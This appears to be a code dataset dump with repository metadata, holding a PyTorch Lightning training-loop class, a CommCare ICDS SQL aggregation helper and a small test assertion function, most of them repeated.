from pytorch_lightning.utilities import _TPU_AVAILABLE, AMPType, DeviceType
from pytorch_lightning.utilities.distributed import rank_zero_info
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.finite_checks import detect_nan_parameters
from pytorch_lightning.utilities.grads import grad_norm
from pytorch_lightning.utilities.model_helpers import is_overridden
from pytorch_lightning.utilities.parsing import AttributeDict
from pytorch_lightning.utilities.signature_utils import is_param_in_hook_signature
from pytorch_lightning.utilities.warnings import WarningCache
class TrainLoop:
def __init__(self, trainer, multiple_trainloader_mode: str):
self.trainer = trainer
self.accumulated_loss = None
self.warning_cache = WarningCache()
self._teardown_already_run = False
self.running_loss = TensorRunningAccum(window_length=20)
self._curr_step_result = None
self._cur_grad_norm_dict = None
self._multiple_trainloader_mode = multiple_trainloader_mode
self._skip_backward = False
self.trainer._multiple_trainloader_mode = multiple_trainloader_mode
self._optimizer_freq_cumsum = None
def on_trainer_init(
self,
max_epochs: Optional[int],
min_epochs: Optional[int],
max_steps: Optional[int],
min_steps: Optional[int],
num_sanity_val_steps: int,
) -> None:
self.trainer.global_step = 0
self.trainer.current_epoch = 0
self.trainer.should_stop = False
self.trainer.state = TrainerState()
self.trainer.total_batch_idx = 0
self.trainer.batch_idx = 0
self.trainer.num_training_batches = 0
self.trainer.train_dataloader = None
self.trainer.max_epochs = 1000 if (max_epochs is None and max_steps is None) else max_epochs
self.trainer.min_epochs = 1 if (min_epochs is None and min_steps is None) else min_epochs
self.trainer.max_steps = max_steps
self.trainer.min_steps = min_steps
if num_sanity_val_steps == -1:
self.trainer.num_sanity_val_steps = float("inf")
else:
self.trainer.num_sanity_val_steps = num_sanity_val_steps
@property
def num_optimizers(self):
num_optimizers = len(self.get_optimizers_iterable())
return num_optimizers
@property
def optimizer_freq_cumsum(self):
if self._optimizer_freq_cumsum is None:
self._optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies)
return self._optimizer_freq_cumsum
def should_skip_training(self):
should_by_max_steps = self.trainer.max_steps is not None and self.trainer.global_step >= self.trainer.max_steps
should_by_epoch = self.trainer.max_epochs is not None and self.trainer.current_epoch >= self.trainer.max_epochs
return should_by_max_steps or should_by_epoch or self.trainer.num_training_batches == 0
def on_train_start(self):
self.trainer.call_hook("on_train_start")
def on_train_end(self):
if self._teardown_already_run:
return
self._teardown_already_run = True
self.trainer.global_step -= 1
self.check_checkpoint_callback(should_update=True, is_last=True)
self.trainer.global_step += 1
self.trainer.call_hook("on_train_end")
if self.trainer.logger is not None:
self.trainer.logger.finalize("success")
self.trainer.profiler.describe()
self.trainer.accelerator.on_train_end()
self.trainer.state.stage = None
def check_checkpoint_callback(self, should_update, is_last=False):
if should_update and self.trainer.checkpoint_connector.has_trained:
callbacks = self.trainer.checkpoint_callbacks
if is_last and any(cb.save_last and cb.verbose for cb in callbacks):
rank_zero_info("Saving latest checkpoint...")
model = self.trainer.lightning_module
for cb in callbacks:
cb.on_validation_end(self.trainer, model)
def on_train_epoch_start(self, epoch):
self.trainer.current_epoch = epoch
model = self.trainer.lightning_module
if epoch != 0 and self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_train_dataloader(model)
with suppress(Exception):
self.trainer.train_dataloader.sampler.set_epoch(epoch)
self.trainer.accumulation_scheduler.on_train_epoch_start(self.trainer, self.trainer.lightning_module)
self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches)
self.trainer.call_hook("on_epoch_start")
self.trainer.call_hook("on_train_epoch_start")
def on_train_batch_end(self, epoch_output, batch_end_outputs, batch, batch_idx, dataloader_idx):
batch_end_outputs = [opt_idx_out for opt_idx_out in batch_end_outputs if len(opt_idx_out)]
processed_batch_end_outputs = TrainLoop._prepare_outputs(batch_end_outputs, batch_mode=True)
self.trainer.call_hook('on_train_batch_end', processed_batch_end_outputs, batch, batch_idx, dataloader_idx)
self.trainer.call_hook('on_batch_end')
self.track_epoch_end_reduce_metrics(epoch_output, batch_end_outputs)
self.trainer.logger_connector.on_train_batch_end()
def reset_train_val_dataloaders(self, model) -> None:
if self.trainer.train_dataloader is None:
self.trainer.reset_train_dataloader(model)
if self.trainer.val_dataloaders is None:
self.trainer.reset_val_dataloader(model)
def track_epoch_end_reduce_metrics(self, epoch_output, batch_end_outputs):
hook_overridden = self._should_add_batch_output_to_epoch_output()
for opt_idx, opt_outputs in enumerate(batch_end_outputs):
sample_output = opt_outputs[-1]
auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end
if not (hook_overridden or auto_reduce_tng_result):
continue
if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result):
opt_outputs = opt_outputs[0]
epoch_output[opt_idx].append(opt_outputs)
def _should_add_batch_output_to_epoch_output(self) -> bool:
# We add to the epoch outputs if
# 1. The model defines training_epoch_end OR
# 2. The model overrides on_train_epoch_end which has `outputs` in the signature
# TODO: in v1.5 this only needs to check if training_epoch_end is overridden
lightning_module = self.trainer.lightning_module
if is_overridden("training_epoch_end", model=lightning_module):
return True
if is_overridden("on_train_epoch_end", model=lightning_module):
model_hook_fx = getattr(lightning_module, "on_train_epoch_end")
if is_param_in_hook_signature(model_hook_fx, "outputs"):
return True
return False
def get_optimizers_iterable(self, batch_idx=None):
if not self.trainer.optimizer_frequencies:
# call training_step once per optimizer
return list(enumerate(self.trainer.optimizers))
if batch_idx is None:
batch_idx = self.trainer.total_batch_idx
optimizers_loop_length = self.optimizer_freq_cumsum[-1]
current_place_in_loop = batch_idx % optimizers_loop_length
# find optimzier index by looking for the first {item > current_place} in the cumsum list
opt_idx = np.argmax(self.optimizer_freq_cumsum > current_place_in_loop)
return [[opt_idx, self.trainer.optimizers[opt_idx]]]
def on_after_backward(self, training_step_output, batch_idx, untouched_loss):
training_step_output.detach()
# insert after step hook
self.trainer.call_hook("on_after_backward")
# when in dev debugging track the losses
self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach())
def _check_training_step_output(self, training_step_output):
if isinstance(training_step_output, torch.Tensor) and not self.trainer.lightning_module.automatic_optimization:
if training_step_output.grad_fn is None:
# TODO: Find why - RuntimeError: Expected to mark a variable ready only once ...
raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor")
def training_step(self, split_batch, batch_idx, opt_idx, hiddens):
# give the PL module a result for logging
model_ref = self.trainer.lightning_module
with self.trainer.profiler.profile("model_forward"):
args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens)
# manually capture logged metrics
model_ref._current_fx_name = 'training_step'
model_ref._results = Result()
with self.trainer.profiler.profile("training_step"):
training_step_output = self.trainer.accelerator.training_step(args)
self.trainer.accelerator.post_training_step()
self.trainer.logger_connector.cache_logged_metrics()
self._check_training_step_output(training_step_output)
training_step_output = self.trainer.call_hook("training_step_end", training_step_output)
training_step_output_for_epoch_end, training_step_output = self._process_training_step_output(
training_step_output, split_batch
)
if training_step_output_for_epoch_end is None:
return
# enable empty loss when using manual opt
closure_loss = None
untouched_loss = None
if self.trainer.lightning_module.automatic_optimization:
# accumulate loss. if accumulate_grad_batches==1, no effect
closure_loss = training_step_output.minimize / self.trainer.accumulate_grad_batches
# the loss will get scaled for amp. avoid any modifications to it
untouched_loss = closure_loss.detach().clone()
# result
result = AttributeDict(
closure_loss=closure_loss,
loss=untouched_loss,
training_step_output=training_step_output,
training_step_output_for_epoch_end=training_step_output_for_epoch_end,
)
return result
def _process_training_step_output(self, training_step_output, split_batch):
training_step_output_for_epoch_end = training_step_output
# enable validation_step return None
if training_step_output_for_epoch_end is None:
return None, None
result = self.trainer.lightning_module._results
loss = None
hiddens = None
result["extra"] = {}
# handle dict return
if isinstance(training_step_output, dict):
loss = training_step_output.pop("loss", None)
hiddens = training_step_output.pop("hiddens", None)
if hiddens is not None:
hiddens = hiddens.detach()
result["extra"] = training_step_output
# handle scalar return
elif isinstance(training_step_output, torch.Tensor):
loss = training_step_output
# map to results under the hood
result.minimize = loss
self.trainer.hiddens = hiddens
# track batch for manual reduction with result
result.track_batch_size(len(split_batch))
# track metrics without grads for epoch reduction
training_step_output_for_epoch_end = copy(result)
training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach()
if self.trainer.move_metrics_to_cpu:
training_step_output_for_epoch_end = training_step_output_for_epoch_end.cpu()
return training_step_output_for_epoch_end, result
@staticmethod
def _prepare_outputs(
outputs: List[List[List[Result]]],
batch_mode: bool,
) -> Union[List[List[List[Dict]]], List[List[Dict]], List[Dict], Dict]:
processed_outputs = []
for opt_outputs in outputs:
# handle an edge case where an optimizer output is the empty list
if len(opt_outputs) == 0:
continue
processed_batch_outputs = []
if batch_mode:
opt_outputs = [opt_outputs]
for batch_outputs in opt_outputs:
processed_tbptt_outputs = []
for tbptt_output in batch_outputs:
out = tbptt_output.extra
out['loss'] = tbptt_output.minimize
processed_tbptt_outputs.append(out)
# if there was only one tbptt step then we can collapse that dimension
if len(processed_tbptt_outputs) == 1:
processed_tbptt_outputs = processed_tbptt_outputs[0]
processed_batch_outputs.append(processed_tbptt_outputs)
# batch_outputs should be just one dict (or a list of dicts if using tbptt) per optimizer
if batch_mode:
processed_batch_outputs = processed_batch_outputs[0]
processed_outputs.append(processed_batch_outputs)
# if there is only one optimiser then we collapse that dimension
if len(processed_outputs) == 1:
processed_outputs = processed_outputs[0]
return processed_outputs
def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure):
model_ref = self.trainer.lightning_module
is_lbfgs = isinstance(optimizer, torch.optim.LBFGS)
using_native_amp = self.trainer.amp_backend == AMPType.NATIVE
# native amp + lbfgs is a no go right now
if using_native_amp and is_lbfgs:
raise MisconfigurationException(
'native PyTorch amp and lbfgs are not compatible.'
' To request, please file a Github issue in PyTorch and tag @mcarilli'
)
# wraps into LightningOptimizer only for running step
optimizer = LightningOptimizer._to_lightning_optimizer(optimizer, self.trainer, opt_idx)
# model hook
model_ref.optimizer_step(
self.trainer.current_epoch,
batch_idx,
optimizer,
opt_idx,
train_step_and_backward_closure,
on_tpu=self.trainer._device_type == DeviceType.TPU and _TPU_AVAILABLE,
using_native_amp=using_native_amp,
using_lbfgs=is_lbfgs,
)
def on_before_zero_grad(self, optimizer):
self.trainer.call_hook('on_before_zero_grad', optimizer)
def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx):
self.trainer.accelerator.optimizer_zero_grad(self.trainer.current_epoch, batch_idx, optimizer, opt_idx)
def track_and_norm_grad(self, optimizer):
# track gradient norms
grad_norm_dic = self._track_gradient_norm()
# clip gradients
self.trainer.accelerator.clip_gradients(
optimizer, self.trainer.gradient_clip_val, gradient_clip_algorithm=self.trainer.gradient_clip_algorithm
)
self._cur_grad_norm_dict = grad_norm_dic
def _track_gradient_norm(self):
grad_norm_dict = {}
if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0:
if float(self.trainer.track_grad_norm) > 0:
model = self.trainer.lightning_module
grad_norm_dict = grad_norm(model, self.trainer.track_grad_norm)
return grad_norm_dict
def _tbptt_split_batch(self, batch: Any) -> List[Any]:
splits = [batch]
truncated_bptt_enabled = self._truncated_bptt_enabled()
if truncated_bptt_enabled:
model_ref = self.trainer.lightning_module
with self.trainer.profiler.profile("tbptt_split_batch"):
splits = model_ref.tbptt_split_batch(batch, self._truncated_bptt_steps())
return splits
def run_training_epoch(self):
# modify dataloader if needed (ddp, etc...)
train_dataloader = self.trainer.accelerator.process_dataloader(self.trainer.train_dataloader)
# track epoch output
epoch_output = [[] for _ in range(self.num_optimizers)]
train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader)
dataloader_idx = 0
val_loop_called = False
batch_idx = None
is_last_batch = None
for batch_idx, (batch, is_last_batch) in train_dataloader:
self.trainer.batch_idx = batch_idx
self.trainer.is_last_batch = is_last_batch
# ------------------------------------
# TRAINING_STEP + TRAINING_STEP_END
# ------------------------------------
with self.trainer.profiler.profile("run_training_batch"):
batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx)
# when returning -1 from train_step, we end epoch early
if batch_output.signal == -1:
break
# hook
# TODO: add outputs to batches
self.on_train_batch_end(
epoch_output,
batch_output.training_step_output_for_epoch_end,
batch,
batch_idx,
dataloader_idx,
)
# -----------------------------------------
# SAVE METRICS TO LOGGERS
# -----------------------------------------
self.trainer.logger_connector.log_train_step_metrics(batch_output)
# -----------------------------------------
# VALIDATE IF NEEDED
# -----------------------------------------
should_check_val = self._should_check_val_fx(batch_idx, is_last_batch)
if should_check_val:
self.trainer.validating = True
self.trainer.run_evaluation()
self.trainer.training = True
val_loop_called = True
# -----------------------------------------
# SAVE LOGGERS (ie: Tensorboard, etc...)
# -----------------------------------------
self.save_loggers_on_train_batch_end()
# update LR schedulers
monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics)
self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics)
self.trainer.checkpoint_connector.has_trained = True
# max steps reached, end training
if (
self.trainer.max_steps is not None and self.trainer.max_steps <= self.trainer.global_step + 1
and self._accumulated_batches_reached()
):
break
# end epoch early
# stop when the flag is changed or we've gone past the amount
if self.trainer.should_stop:
break
self.trainer.total_batch_idx += 1
if self._num_training_batches_reached(is_last_batch):
break
self.increment_accumulated_grad_global_step()
if batch_idx is None:
return
self.on_train_epoch_end(epoch_output)
self.trainer.logger_connector.log_train_epoch_end_metrics(epoch_output)
should_check_val = self._should_check_val_fx(batch_idx, is_last_batch, on_epoch=True)
should_skip_eval = self.trainer.evaluation_loop.should_skip_evaluation(self.trainer.num_val_batches)
should_train_only = self.trainer.disable_validation or should_skip_eval
if (val_loop_called and not should_check_val) or should_train_only:
self.trainer.optimizer_connector.update_learning_rates(interval='epoch')
if should_train_only:
self.check_checkpoint_callback(True)
if should_check_val:
self.trainer.validating = True
self.trainer.run_evaluation(on_epoch=True)
self.trainer.training = True
self.increment_accumulated_grad_global_step()
def on_train_epoch_end(self, epoch_output: List[List[List[Result]]]) -> None:
self.trainer.logger_connector.on_train_epoch_end()
processed_epoch_output = TrainLoop._prepare_outputs(epoch_output, batch_mode=False)
model = self.trainer.lightning_module
if is_overridden('training_epoch_end', model=model):
model._current_fx_name = 'training_epoch_end'
training_epoch_end_output = model.training_epoch_end(processed_epoch_output)
if training_epoch_end_output is not None:
raise MisconfigurationException(
'training_epoch_end expects a return of None. '
'HINT: remove the return statement in training_epoch_end'
)
self.trainer.logger_connector.cache_logged_metrics()
self._on_train_epoch_end_hook(processed_epoch_output)
self.trainer.call_hook('on_epoch_end')
def _on_train_epoch_end_hook(self, processed_epoch_output) -> None:
hook_name = "on_train_epoch_end"
skip = self.trainer._reset_result_and_set_hook_fx_name(hook_name)
with self.trainer.profiler.profile(hook_name):
if hasattr(self.trainer, hook_name):
trainer_hook = getattr(self.trainer, hook_name)
trainer_hook(processed_epoch_output)
model_ref = self.trainer.lightning_module
if is_overridden(hook_name, model_ref):
hook_fx = getattr(model_ref, hook_name)
if is_param_in_hook_signature(hook_fx, "outputs"):
self.warning_cache.warn(
"The signature of `ModelHooks.on_train_epoch_end` has changed in v1.3."
" `outputs` parameter has been deprecated."
" Support for the old signature will be removed in v1.5", DeprecationWarning
)
model_ref.on_train_epoch_end(processed_epoch_output)
else:
model_ref.on_train_epoch_end()
# used to auto-reduce things for the user with Results obj
elif hasattr(self.trainer.accelerator, hook_name):
accelerator_hook = getattr(self.trainer.accelerator, hook_name)
accelerator_hook()
if not skip:
self.trainer._cache_logged_metrics()
def run_training_batch(self, batch, batch_idx, dataloader_idx):
# track grad norms
grad_norm_dic = {}
# bookkeeping
self.trainer.hiddens = None
optimizers = self.prepare_optimizers()
# track all outputs across time and num of optimizers
batch_outputs = [[] for _ in range(len(optimizers))]
if batch is None:
self.warning_cache.warn("train_dataloader yielded None. If this was on purpose, ignore this warning...")
return AttributeDict(
signal=0,
grad_norm_dic=grad_norm_dic,
training_step_output_for_epoch_end=batch_outputs,
)
# hook
response = self.trainer.call_hook("on_batch_start")
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# hook
response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx)
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# lightning module hook
splits = self._tbptt_split_batch(batch)
for split_idx, split_batch in enumerate(splits):
# create an iterable for optimizers and loop over them
for opt_idx, optimizer in optimizers:
# toggle model params + set info to logger_connector
self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer)
if self.should_accumulate():
# For gradient accumulation
# -------------------
# calculate loss (train step + train step end)
# -------------------
# automatic_optimization=True: perform dpp sync only when performing optimizer_step
# automatic_optimization=False: don't block synchronization here
with self.block_ddp_sync_behaviour():
self.training_step_and_backward(
split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens
)
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
else:
if self.trainer.lightning_module.automatic_optimization:
def train_step_and_backward_closure():
result = self.training_step_and_backward(
split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens
)
return None if result is None else result.loss
self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure)
else:
self._curr_step_result = self.training_step(
split_batch, batch_idx, opt_idx, self.trainer.hiddens
)
if self._curr_step_result is None:
continue
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
grad_norm_dic = self._cur_grad_norm_dict
self._cur_grad_norm_dict = None
self.update_running_loss()
result = AttributeDict(
signal=0,
grad_norm_dic=grad_norm_dic,
training_step_output_for_epoch_end=batch_outputs,
)
return result
@contextmanager
def block_ddp_sync_behaviour(self, should_block_sync: bool = False):
if (
isinstance(self.trainer.training_type_plugin, ParallelPlugin)
and (self.trainer.lightning_module.automatic_optimization or should_block_sync)
):
with self.trainer.training_type_plugin.block_backward_sync():
yield None
else:
yield None
def _process_closure_result(self, batch_outputs: list, opt_idx: int) -> list:
opt_closure_result = self._curr_step_result
if opt_closure_result is not None:
self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result)
if self.trainer.terminate_on_nan:
self._check_finite(opt_closure_result.loss)
batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0
batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end)
if self.trainer.lightning_module.automatic_optimization:
self.accumulated_loss.append(opt_closure_result.loss)
self._curr_step_result = None
return batch_outputs
def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens):
with self.trainer.profiler.profile("training_step_and_backward"):
result = self.training_step(split_batch, batch_idx, opt_idx, hiddens)
self._curr_step_result = result
if not self._skip_backward and self.trainer.lightning_module.automatic_optimization:
is_first_batch_to_accumulate = batch_idx % self.trainer.accumulate_grad_batches == 0
if is_first_batch_to_accumulate:
self.on_before_zero_grad(optimizer)
self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
if result is not None:
with self.trainer.profiler.profile("backward"):
self.backward(result, optimizer, opt_idx)
if not self.should_accumulate():
self.on_after_backward(result.training_step_output, batch_idx, result.loss)
if self.trainer.terminate_on_nan:
self._check_finite(result.loss)
else:
self.warning_cache.warn(
"training_step returned None. If this was on purpose, ignore this warning..."
)
if len(self.trainer.optimizers) > 1:
self.trainer.lightning_module.untoggle_optimizer(opt_idx)
return result
def _check_finite(self, loss: torch.Tensor) -> None:
if not torch.isfinite(loss).all():
raise ValueError(f'The loss returned in `training_step` is {loss}.')
model = self.trainer.lightning_module
detect_nan_parameters(model)
def backward(self, result, optimizer, opt_idx, *args, **kwargs):
self.trainer.dev_debugger.track_event("backward_call")
should_accumulate = self.should_accumulate()
if isinstance(result, torch.Tensor):
self.trainer.accelerator.backward(result, optimizer, opt_idx, should_accumulate, *args, **kwargs)
else:
result.closure_loss = self.trainer.accelerator.backward(
result.closure_loss, optimizer, opt_idx, should_accumulate, *args, **kwargs
)
if not self.should_accumulate():
self.track_and_norm_grad(optimizer=optimizer)
def update_train_loop_lr_schedulers(self, monitor_metrics=None):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
if num_accumulated_batches_reached or num_training_batches_reached:
self.trainer.optimizer_connector.update_learning_rates(
interval="step",
monitor_metrics=monitor_metrics,
opt_indices=[opt_idx for opt_idx, _ in self.get_optimizers_iterable()],
)
def increment_accumulated_grad_global_step(self):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
if num_accumulated_batches_reached or num_training_batches_reached:
self.trainer.global_step = self.trainer.accelerator.update_global_step(
self.trainer.total_batch_idx, self.trainer.global_step
)
def _accumulated_batches_reached(self):
return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0
def _num_training_batches_reached(self, is_last_batch=False):
return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches or is_last_batch
def should_accumulate(self):
accumulation_done = self._accumulated_batches_reached()
is_final_batch = self._num_training_batches_reached()
return not (accumulation_done or is_final_batch)
def _should_check_val_fx(self, batch_idx: int, is_last_batch: bool, on_epoch: bool = False) -> bool:
if not self.trainer.enable_validation:
return False
if (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch != 0:
return False
is_val_check_batch = False
if isinstance(self.trainer.limit_train_batches, int) and self.trainer.val_check_batch == float('inf'):
is_val_check_batch = (batch_idx + 1) % self.trainer.limit_train_batches == 0
elif self.trainer.val_check_batch != float('inf'):
is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0
epoch_end_val_check = (batch_idx + 1) % self.trainer.num_training_batches == 0
is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf")
if on_epoch:
return (
is_val_check_batch and epoch_end_val_check
) or self.trainer.should_stop or is_last_batch_for_infinite_dataset
else:
return is_val_check_batch and not epoch_end_val_check
def build_train_args(self, batch, batch_idx, opt_idx, hiddens):
args = [batch, batch_idx]
if len(self.trainer.optimizers) > 1:
if self.trainer.has_arg("training_step", "optimizer_idx"):
if not self.trainer.lightning_module.automatic_optimization:
self.warning_cache.warn(
"`training_step` hook signature has changed in v1.3."
" `optimizer_idx` argument has been removed in case of manual optimization. Support for"
" the old signature will be removed in v1.5", DeprecationWarning
)
args.append(opt_idx)
elif not self.trainer.has_arg(
"training_step", "optimizer_idx"
) and self.trainer.lightning_module.automatic_optimization:
raise ValueError(
f"Your LightningModule defines {len(self.trainer.optimizers)} optimizers but"
' `training_step` is missing the `optimizer_idx` argument.'
)
if self._truncated_bptt_enabled():
args.append(hiddens)
return args
def _truncated_bptt_enabled(self) -> bool:
return self._truncated_bptt_steps() > 0
def _truncated_bptt_steps(self) -> int:
lightning_module = self.trainer.lightning_module
if lightning_module.truncated_bptt_steps > 0:
return lightning_module.truncated_bptt_steps
return self.trainer.truncated_bptt_steps or 0
def save_loggers_on_train_batch_end(self):
should_flush_logs = self.trainer.logger_connector.should_flush_logs
if should_flush_logs and self.trainer.is_global_zero and self.trainer.logger is not None:
self.trainer.logger.save()
def prepare_optimizers(self):
optimizers = self.get_optimizers_iterable()
if not self.trainer.lightning_module.automatic_optimization:
optimizers = [optimizers[0]]
return optimizers
def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer):
self.trainer.split_idx = split_idx
# in the training step to prevent dangling gradients in multiple-optimizer setup.
if self.trainer.lightning_module.automatic_optimization and len(self.trainer.optimizers) > 1:
model = self.trainer.lightning_module
model.toggle_optimizer(optimizer, opt_idx)
# use to track metrics internally
self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch)
def update_running_loss(self):
accumulated_loss = self.accumulated_loss.mean()
if accumulated_loss is not None:
# calculate running loss for display
self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches)
# reset for next set of accumulated grads
self.accumulated_loss.reset()
| true
| true
|
790dc5834f863fef842206787568d1423fd56a03
| 2,499
|
py
|
Python
|
custom/icds_reports/utils/aggregation_helpers/distributed/thr_forms_child_health.py
|
kkrampa/commcare-hq
|
d64d7cad98b240325ad669ccc7effb07721b4d44
|
[
"BSD-3-Clause"
] | 1
|
2020-05-05T13:10:01.000Z
|
2020-05-05T13:10:01.000Z
|
custom/icds_reports/utils/aggregation_helpers/distributed/thr_forms_child_health.py
|
kkrampa/commcare-hq
|
d64d7cad98b240325ad669ccc7effb07721b4d44
|
[
"BSD-3-Clause"
] | 1
|
2019-12-09T14:00:14.000Z
|
2019-12-09T14:00:14.000Z
|
custom/icds_reports/utils/aggregation_helpers/distributed/thr_forms_child_health.py
|
MaciejChoromanski/commcare-hq
|
fd7f65362d56d73b75a2c20d2afeabbc70876867
|
[
"BSD-3-Clause"
] | 5
|
2015-11-30T13:12:45.000Z
|
2019-07-01T19:27:07.000Z
|
from __future__ import absolute_import
from __future__ import unicode_literals
from dateutil.relativedelta import relativedelta
from custom.icds_reports.const import AGG_CHILD_HEALTH_THR_TABLE
from custom.icds_reports.utils.aggregation_helpers import month_formatter
from custom.icds_reports.utils.aggregation_helpers.distributed.base import BaseICDSAggregationDistributedHelper
class THRFormsChildHealthAggregationDistributedHelper(BaseICDSAggregationDistributedHelper):
helper_key = 'thr-forms-child-health'
ucr_data_source_id = 'static-dashboard_thr_forms'
tablename = AGG_CHILD_HEALTH_THR_TABLE
def aggregate(self, cursor):
drop_query, drop_params = self.drop_table_query()
agg_query, agg_params = self.aggregation_query()
cursor.execute(drop_query, drop_params)
cursor.execute(agg_query, agg_params)
def drop_table_query(self):
return (
'DELETE FROM "{}" WHERE month=%(month)s AND state_id = %(state)s'.format(self.tablename),
{'month': month_formatter(self.month), 'state': self.state_id}
)
def aggregation_query(self):
month = self.month.replace(day=1)
current_month_start = month_formatter(self.month)
next_month_start = month_formatter(self.month + relativedelta(months=1))
query_params = {
"month": month_formatter(month),
"state_id": self.state_id,
"current_month_start": current_month_start,
"next_month_start": next_month_start,
}
return """
INSERT INTO "{tablename}" (
state_id, supervisor_id, month, case_id, latest_time_end_processed, days_ration_given_child
) (
SELECT DISTINCT ON (child_health_case_id)
%(state_id)s AS state_id,
LAST_VALUE(supervisor_id) over w AS supervisor_id,
%(month)s AS month,
child_health_case_id AS case_id,
MAX(timeend) over w AS latest_time_end_processed,
SUM(days_ration_given_child) over w AS days_ration_given_child
FROM "{ucr_tablename}"
WHERE state_id = %(state_id)s AND
timeend >= %(current_month_start)s AND timeend < %(next_month_start)s AND
child_health_case_id IS NOT NULL
WINDOW w AS (PARTITION BY supervisor_id, child_health_case_id)
)
""".format(
ucr_tablename=self.ucr_tablename,
tablename=self.tablename
), query_params
| 40.967213
| 111
| 0.687875
|
from __future__ import absolute_import
from __future__ import unicode_literals
from dateutil.relativedelta import relativedelta
from custom.icds_reports.const import AGG_CHILD_HEALTH_THR_TABLE
from custom.icds_reports.utils.aggregation_helpers import month_formatter
from custom.icds_reports.utils.aggregation_helpers.distributed.base import BaseICDSAggregationDistributedHelper
class THRFormsChildHealthAggregationDistributedHelper(BaseICDSAggregationDistributedHelper):
helper_key = 'thr-forms-child-health'
ucr_data_source_id = 'static-dashboard_thr_forms'
tablename = AGG_CHILD_HEALTH_THR_TABLE
def aggregate(self, cursor):
drop_query, drop_params = self.drop_table_query()
agg_query, agg_params = self.aggregation_query()
cursor.execute(drop_query, drop_params)
cursor.execute(agg_query, agg_params)
def drop_table_query(self):
return (
'DELETE FROM "{}" WHERE month=%(month)s AND state_id = %(state)s'.format(self.tablename),
{'month': month_formatter(self.month), 'state': self.state_id}
)
def aggregation_query(self):
month = self.month.replace(day=1)
current_month_start = month_formatter(self.month)
next_month_start = month_formatter(self.month + relativedelta(months=1))
query_params = {
"month": month_formatter(month),
"state_id": self.state_id,
"current_month_start": current_month_start,
"next_month_start": next_month_start,
}
return """
INSERT INTO "{tablename}" (
state_id, supervisor_id, month, case_id, latest_time_end_processed, days_ration_given_child
) (
SELECT DISTINCT ON (child_health_case_id)
%(state_id)s AS state_id,
LAST_VALUE(supervisor_id) over w AS supervisor_id,
%(month)s AS month,
child_health_case_id AS case_id,
MAX(timeend) over w AS latest_time_end_processed,
SUM(days_ration_given_child) over w AS days_ration_given_child
FROM "{ucr_tablename}"
WHERE state_id = %(state_id)s AND
timeend >= %(current_month_start)s AND timeend < %(next_month_start)s AND
child_health_case_id IS NOT NULL
WINDOW w AS (PARTITION BY supervisor_id, child_health_case_id)
)
""".format(
ucr_tablename=self.ucr_tablename,
tablename=self.tablename
), query_params
| true
| true
|
790dc58cba6e9460dc0cc024e7ffda0c2b5e7fde
| 223
|
py
|
Python
|
tests/test_formats/test_seq/asserts.py
|
NickleDave/conbirt
|
71db6c6fd68dfef1bdbdcfacd8b2a16b21b86089
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_formats/test_seq/asserts.py
|
NickleDave/conbirt
|
71db6c6fd68dfef1bdbdcfacd8b2a16b21b86089
|
[
"BSD-3-Clause"
] | 3
|
2018-12-16T17:57:22.000Z
|
2018-12-16T20:12:33.000Z
|
tests/test_formats/test_seq/asserts.py
|
NickleDave/conbirt
|
71db6c6fd68dfef1bdbdcfacd8b2a16b21b86089
|
[
"BSD-3-Clause"
] | null | null | null |
def assert_rounded_correct_num_decimals(on_offset_arr, decimals):
__tracebackhide__ = True
assert all(
[len(str(float(boundary_s)).split('.')[-1]) <= decimals
for boundary_s in on_offset_arr]
)
| 31.857143
| 65
| 0.681614
|
def assert_rounded_correct_num_decimals(on_offset_arr, decimals):
__tracebackhide__ = True
assert all(
[len(str(float(boundary_s)).split('.')[-1]) <= decimals
for boundary_s in on_offset_arr]
)
| true
| true
|
790dc5a4df3d2a6abf652c7c38db3d90988645fa
| 2,617
|
py
|
Python
|
commandWindow.py
|
sturzl/keyboardControlSocket
|
